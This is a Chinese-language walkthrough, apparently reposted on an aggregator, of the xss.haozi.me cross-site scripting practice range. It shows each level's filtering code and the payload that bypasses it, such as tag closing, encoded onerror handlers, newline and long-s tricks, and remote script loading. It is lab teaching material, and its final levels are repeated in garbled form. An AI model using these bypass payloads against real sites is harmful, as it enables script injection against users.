xss靶场、xss.haozi.me靶场详细通关教程

这篇具有很好参考价值的文章主要介绍了xss靶场、xss.haozi.me靶场详细通关教程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

该靶场来自xss经典靶场,其中一些解题方法也是根据官方的题解。该文章主要用于记录自己的学习历程。xss.haozi.me是一个学习xss漏洞非常不错的靶场,里面集合了各种绕过方式,对于小白来说非常具有学习意义。

预备知识

HTML编码

HTML编码网站

Html实体编码解码 (config.net.cn)

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

img的可拓展

img标签的可扩展

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

各种payload形式

各种payload

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

0x00

第一关简单使用payload**<script>alert(1)</script>**即可弹出。

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

0x01

使用payload**</textarea><script>alert(1)</script><textarea>**即可绕过。

源代码使用了<textarea> </textarea>来输出,我们使用闭合标签来闭合它俩,即可成功执行。

源代码加上我们的paylaod即为

<textarea></textarea><script>alert(1)</script><textarea></textarea>

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

0x02

这里使用了<input>标签,思路是通过闭合payload

asdf'">'<script>alert(1)</script>

加上闭合payload后,总代码为

function render (input) {
  return '<input type="name" value="'asdf'">'<script>alert(1)</script>'">'
}

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

0x03(使用了正则过滤圆括号)

这里服务器用了一些正则过滤

function render (input) {
  const stripBracketsRe = /[()]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

这段函数的作用是从输入的字符串中移除所有括号(包括圆括号和方括号)。具体来说,它会执行以下操作:

​ 定义一个正则表达式 stripBracketsRe,用于匹配字符串中的所有圆括号和方括号。
​ 调用 replace() 方法将输入字符串中匹配到的所有括号用空字符串替换掉,得到一个不包含任何括号的新字符串。
​ 返回新字符串。
需要注意的是,该函数仅仅只是移除括号,并不会对字符串做其他处理,例如去除空格、转换大小写等等。

这里可以采用反引号来绕过

<script>alert`1`</script>

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

其它解法

虽然过滤了圆括号,我们只需要使用不带圆括号的payload即可。

第一种

其中onerror编码了alert(1)

<img src="1" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

第二种

使用了script中的src来导入js

<script src="https://xss.haozi.me/j.js"></script>

0x04(使用正则过滤圆括号和反引号)

源代码是这样的,它过滤了圆括号和反引号。

所以只能使用HTML实体编码来绕过。

function render (input) {
  const stripBracketsRe = /[()`]/g
  input = input.replace(stripBracketsRe, '')
  return input
}

直接将括号转成html实体编码将没有用

比如这段代码

**<script>alert &#40;1&#41;</script>**如果直接输上去肯定不行,因为

HTML实体编码是为了在HTML文本中使用特殊字符而设计的一种编码方式,比如“<”、“>”、“&”等字符。这些字符在HTML中具有特殊含义,如果直接在HTML文本中使用它们,会导致浏览器将其解释为HTML标签或其他特殊字符,从而破坏文档结构。

因此,在HTML中使用这些字符时,需要将其替换为对应的实体编码形式,例如“<”用“<”代替,“>”用“>”代替,“&”用“&”代替。这样,浏览器就能正确地解析这些字符而不会破坏文档结构。

在这个例子中,代码<script>alert(1)</script>中的括号“(`)”被替换为了实体编码“(”和“)”,这是为了避免浏览器将其解释为JavaScript语句的一部分。当浏览器遇到这段代码时,它会将其解析为一个普通的文本字符串而不会执行其中的JavaScript语句。

所以只能使用一个标签**<img src=1 οnerrοr="alert&#40;1&#41;“**就可以

0x05(绕过html注释符)

服务器源代码是这样的

function render (input) {
  input = input.replace(/-->/g, '😂')
  return '<!-- ' + input + ' -->'
}

意思就是

根据该函数的实现逻辑,只有输入中包含字符串 “–>” 才会被替换为笑脸表情符号 “😂”。因此,只要输入中不包含 “–>” 这个字符串,就可以绕过这个函数的替换操作,从而可能产生一些安全隐患。

在html中注释符不仅仅只能为**<!-- asdf --> 还可以为<!-- asdf --!>**

所以就可以来尝试闭合了

payload为**–!>img src=x οnerrοr=alert(1)>**即可绕过

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

0x06(使用换行绕过)

这是服务器过滤代码,

这段代码是一个 JavaScript 函数,名为 render。该函数接受一个字符串参数 input,并返回一个 HTML 的 input 元素。

这个函数的作用是将 input 字符串中出现的 “auto”、“on.*=”、“>” 字符替换为下划线(“_”),并将这个替换后的字符串作为 input 元素的属性,最终生成的 input 元素类型为 text,且默认值为 1。

function render (input) {
  input = input.replace(/auto|on.*=|>/ig, '_')
  return `<input value=1 ${input} type="text">`
}

οnmοuseοver=asdf,这样会被过滤掉,被过滤成下划线了,所以如果在=后加上一个换行符即可绕过。

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

payload即为 onmouseover
=
alert(1)

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

0x07(img不加闭合符)

服务器源代码如下:

正则表达式 /<\/?[^>]+>/gi 的含义如下:

  1. /<\/?[^>]+>/: 匹配 <> 之间的任意字符,其中 <\/? 匹配 < 或者 </[^>]+ 匹配一个或多个非 > 的字符,> 匹配 > 字符本身。这个正则表达式匹配 HTML 标签的开始和结束标记。
  2. /g: 表示全局匹配,即匹配到一个后继续匹配,直到没有匹配项。
  3. /i: 表示忽略大小写匹配。

因此,这个正则表达式可以匹配所有的 HTML 标签,包括开始标记和结束标记,例如 <p></p><img></img> 等等。将这个正则表达式传递给 replace() 方法,就可以将匹配到的 HTML 标签替换为空字符串,从而去掉 HTML 标签。

function render (input) {
  const stripTagsRe = /<\/?[^>]+>/gi

  input = input.replace(stripTagsRe, '')
  return `<article>${input}</article>`
}

当有**<123>时,就全部会被过滤掉,但是如果<123**就不会被过滤掉。

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

payload即为:<img src=“123” οnerrοr=“alert(1)”

0x08(使用换行绕过)

服务器源代码如下

正则表达式 /<\/?[^>]+>/gi 的含义如下:

  1. /<\/?[^>]+>/: 匹配 <> 之间的任意字符,其中 <\/? 匹配 < 或者 </[^>]+ 匹配一个或多个非 > 的字符,> 匹配 > 字符本身。这个正则表达式匹配 HTML 标签的开始和结束标记。
  2. /g: 表示全局匹配,即匹配到一个后继续匹配,直到没有匹配项。
  3. /i: 表示忽略大小写匹配。

因此,这个正则表达式可以匹配所有的 HTML 标签,包括开始标记和结束标记,例如 <p></p><img></img> 等等。将这个正则表达式传递给 replace() 方法,就可以将匹配到的 HTML 标签替换为空字符串,从而去掉 HTML 标签。

function render (src) {
  src = src.replace(/<\/style>/ig, '/* \u574F\u4EBA */')
  return `
    <style>
      ${src}
    </style>
  `
}

使用换行即可进行绕过

</style
>
<script>alert(1)</script>
<style>

0x09(输入最前面必须带上一段url)

这是服务器源代码:

意思就是说输入的内容必须以 https://www.segmentfault.com开头

function render (input) {
  let domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${input}"></script>`
  }
  return 'Invalid URL'
}

payload如下

https://www.segmentfault.com"></script><script>alert(1)</script>//

先将前面的script闭合,然后再使用js代码实现弹框1,然后通过**//**将后面的script给注释掉。

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

0x0A(URL重定向)

服务器源代码:

这段代码是一个JavaScript函数,它的名称是render。该函数接受一个字符串参数input,并根据该参数返回不同的结果。

函数内部定义了一个嵌套函数escapeHtml,该函数用于将字符串中的特殊字符进行转义,以便在HTML中显示。具体来说,该函数会将字符串中的&'"<>/替换为相应的HTML实体编码。

该函数的主要逻辑是检查输入的字符串是否是以https://www.segmentfault.com开头的URL。如果是,函数会将该URL插入到一个<script>标签的src属性中,并返回该标签的HTML字符串表示。如果输入的字符串不是以https://www.segmentfault.com开头的URL,则返回字符串"Invalid URL"。

总之,这段代码的作用是根据输入的字符串生成一个HTML字符串表示,其中如果输入的字符串是符合条件的URL,将生成一个包含该URL的<script>标签。

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f')
  }

  const domainRe = /^https?:\/\/www\.segmentfault\.com/
  if (domainRe.test(input)) {
    return `<script src="${escapeHtml(input)}"></script>`
  }
  return 'Invalid URL'
}

这段代码大概就是把很多能注入的关键词都给过滤了。

输入的内容最前面必须加上一段网址和上关一样。

所以使用上一关的闭合符将不管用了。

但是根据这个src看来,可以使用引入一段服务器上js代码。

可以使用@重定向来定向到js代码。在服务器中写入一段js代码,使用@重定向来导入js。

但是我不知道为什么一直不成功,所以根据使用官方给出的js代码,不使用自己服务器中的代码来导入js就可以。

payload:

https://www.segmentfault.com.haozi.me/j.js

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a1hmJrNg-1679873092880)(C:\Users\陈勇\AppData\Roaming\Typora\typora-user-images\image-20230326160646711.png)]

0x0B(大写绕过)

服务器源码

将所有输入的代码全给变成大写。

function render (input) {
  input = input.toUpperCase()
  return `<h1>${input}</h1>`
}

这是必须要知道

  1. HTML:不区分大小写
  2. JS:区分大小写

这是如果使用平常的**<script>alert(1)</script>**发现没有什么用。

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

第一种方法:

这是就要使用到**<script src=“https://xss.haozi.me/j.js”></script>**这段代码就可以弹窗过关。

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

第二种方法:

通过img标签,在onerror中加入alert代码的编码形式。

<img src="" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

0x0C(大写+script绕过)

服务器代码:

这段代码就是过滤了script字段,然后就是还和上关一样大写绕过。

function render (input) {
  input = input.replace(/script/ig, '')
  input = input.toUpperCase()
  return '<h1>' + input + '</h1>'
}

这段payload就使用和上关一样的就行img标签

0x0D

0x0E(使用 ſ 绕过)

这段代码大概就是说将所有用<开头的字母都进行了替换,让我们无法正常输入标签。

function render (input) {
  input = input.replace(/<([a-zA-Z])/g, '<_$1')
  input = input.toUpperCase()
  return '<h1>' + input + '</h1>'
}

这里需要使用一个xss特殊的绕过技巧,在html中ſ这个字符转换为s,所以我们通过使用这个字符绕过这里的过滤函数。

payload:

<ſcript src="https://xss.haozi.me/j.js"></script>

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

0x0F

服务器源代码:

将一些注入语句,给转义了,并放在onerror中

function render (input) {
  function escapeHtml(s) {
    return s.replace(/&/g, '&amp;')
            .replace(/'/g, '&#39;')
            .replace(/"/g, '&quot;')
            .replace(/</g, '&lt;')
            .replace(/>/g, '&gt;')
            .replace(/\//g, '&#x2f;')
  }
  return `<img src onerror="console.error('${escapeHtml(input)}')">`
}

但是转义对于JS来说作用不大,我们可以先将闭合,然后使用分号再在后面加上alert(1)语句即可。然后再把后面的给注释掉

payload

');alert(1)//

xss在线靶场,网络安全,xss,服务器,网络安全,安全,web安全

0x10

服务器:

function render (input) {
  return `
<script>
  window.data = ${input}
</script>
  `
}

payload:

alert(1)

0x11

服务器源代码:

进入本关发现在过滤了许多字符的基础上还将,\n、\r等换行操作给过滤了。

所以我们可以先把前面函数闭合,虽然不能使用换行操作,但是我们可以使用或者将代码分隔开来,再把后面字符使用注释符注释就可以成功绕过了。

// from alf.nu
function render (s) {
  function escapeJs (s) {
    return String(s)
            .replace(/\\/g, '\\\\')
            .replace(/'/g, '\\\'')
            .replace(/"/g, '\\"')
            .replace(/`/g, '\\`')
            .replace(/</g, '\\74')
            .replace(/>/g, '\\76')
            .replace(/\//g, '\\/')
            .replace(/\n/g, '\\n')
            .replace(/\r/g, '\\r')
            .replace(/\t/g, '\\t')
            .replace(/\f/g, '\\f')
            .replace(/\v/g, '\\v')
            // .replace(/\b/g, '\\b')
            .replace(/\0/g, '\\0')
  }
  s = escapeJs(s)
  return `
<script>
  var url = 'javascript:console.log("${s}")'
  var a = document.createElement('a')
  a.href = url
  document.body.appendChild(a)
  a.click()
</script>
`
}

payload

");alert(1) //

0x12

服务器:

本关本质其实和上一关一样,就是将"替换为\,防止闭合前面函数。
但是我们可以通过先输入\符号将\进行转义了,这样双引号就能成功闭合了。

// from alf.nu
function escape (s) {
  s = s.replace(/"/g, '\\"')
  return '<script>console.log("' + s + '");</script>'
}

payload

\");alert(1)//

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DPfuxnn1-1679873092882)(C:\Users\陈勇\AppData\Roaming\Typora\typora-user-images\image-20230326220145186.png)]

eJs(s)
return `

`
}


**payload**:

```javascript
");alert(1) //

0x12

服务器:

本关本质其实和上一关一样,就是将"替换为\,防止闭合前面函数。
但是我们可以通过先输入\符号将\进行转义了,这样双引号就能成功闭合了。

// from alf.nu
function escape (s) {
  s = s.replace(/"/g, '\\"')
  return '<script>console.log("' + s + '");</script>'
}

payload

\");alert(1)//

[外链图片转存中…(img-DPfuxnn1-1679873092882)]文章来源地址https://www.toymoban.com/news/detail-724085.html

到了这里,关于xss靶场、xss.haozi.me靶场详细通关教程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Pikachu靶场通关笔记--Cross-Site Scripting (XSS)

    首先,我们先区分get和post的区别。GET是以url方式提交数据;POST是以表单方式在请求体里面提交。通过get提交的数据是可以直接在url中看到的,所以GET方式的XSS漏洞更加容易被利用, 一般利用的方式是将带有跨站脚本的URL伪装后发送给目标,而POST方式由于是以表单方式提交,无法

    2024年02月05日
    浏览(44)
  • [网络安全]upload-labs 本地靶场搭建详细教程

    本文以phpstudy搭建upload-labs本地靶场环境 PhpStudy是一个PHP调试环境的程序集成包,集成最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer,安装后无须配置即可使用。 官网安装地址: PhpStudy Download 链接 安装完成后打开PhpStudy 网站配置如下: upload-labs 靶机下载地址: https://github.co

    2024年02月08日
    浏览(62)
  • Pikachu靶场通关记录(详细)

    Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。 Burt Force(暴力破解漏洞) XSS(跨站脚本漏洞) CSRF(跨站请求伪造) SQL-Inject(SQL注入漏洞) RCE(远程命令/代码执行

    2024年04月16日
    浏览(42)
  • [网络安全]XSS之Cookie外带攻击姿势及例题详析(基于DVWA靶场)

    本文仅分享XSS攻击知识,不承担任何法律责任。 本文涉及的软件等请读者自行安装,本文不再赘述。 XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS(跨站脚本攻击)漏洞进行的攻击,攻击者通过在 XSS 攻击中注入恶意脚本,从而 窃取用户的 Cookie 信息 。 在使用XSS语

    2024年02月08日
    浏览(53)
  • SQL-Labs靶场“11-15”关通关教程

    点击跳转: SQL-Labs靶场“1-5”关通关教程 SQL-Labs靶场“6-10”关通关教程 请求方式 注入类型 拼接方式 POST 联合、报错、布尔盲注、延时盲注 username=‘x’ 看见输入框了,说明该注入提交方式为POST,同时我们先寻找注入点: 在输入框中输入单引号: 我们可以看到产生了报错信

    2024年02月19日
    浏览(70)
  • 【史上最全sqlmap通关sqli-labs靶场教程】

    下载sqlmap地址:sqlmap: automatic SQL injection and database takeover tool 下载完成后解压在C盘或者D盘都行,自己别忘了就可以 解压后在目标文件夹下打开cmd,运行python sqlmap.py -h 运行后出现sqlmap的说明,表示安装成功 ( 这里补充一下,-h其实不是完成的说明,-hh可以获得更多说明, )

    2024年01月19日
    浏览(38)
  • 如何利用在线网络靶场将安全提升至新水平

    在 Standoff 365 的在线网络靶场中,任何公司都可以试验信息安全手段和企业网络设置,优化攻击检测、响应和事件调查的技能。 2023 年,我们不仅准许攻击者使用,也准许防御者使用。我们可以根据客户要求轻松部署 10 个细分行业中的任一行业,或帮助公司重建他们自己

    2024年01月20日
    浏览(54)
  • web安全-文件上传漏洞-图片马制作-相关php函数讲解-upload靶场通关详细教学(3)

    制作图片马有两种方法,一种是文本方式打开,末尾粘贴一句话木马,令一种是使用命令进行合成。 方法1 首先准备好一个图片(这里是1.png)。 将一个图片以文本格式打开(这里用的Notepad++,以记事本方式打开修改也能连接成功,不过修改后图片无法正常显示了)。 后面粘

    2024年02月06日
    浏览(56)
  • 网络安全之DVWA通关教程

    DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员理解web应用保护的过程,还可以在课堂中为师生的安全性教学提供便

    2024年02月13日
    浏览(44)
  • pikachu通关教程通关详解超详细

    基于表单:抓包,发送给测试器,设置payload爆破 验证码绕过(on server):验证码不提交的话不会变化 验证码绕过(on client):基于客户端,验证码是本地源代码生产的F12找到删除 Token放爆破:正常抓包,看到加入了token,每次提交token的值都会变化 但是这里抓服务器响应的

    2024年02月03日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包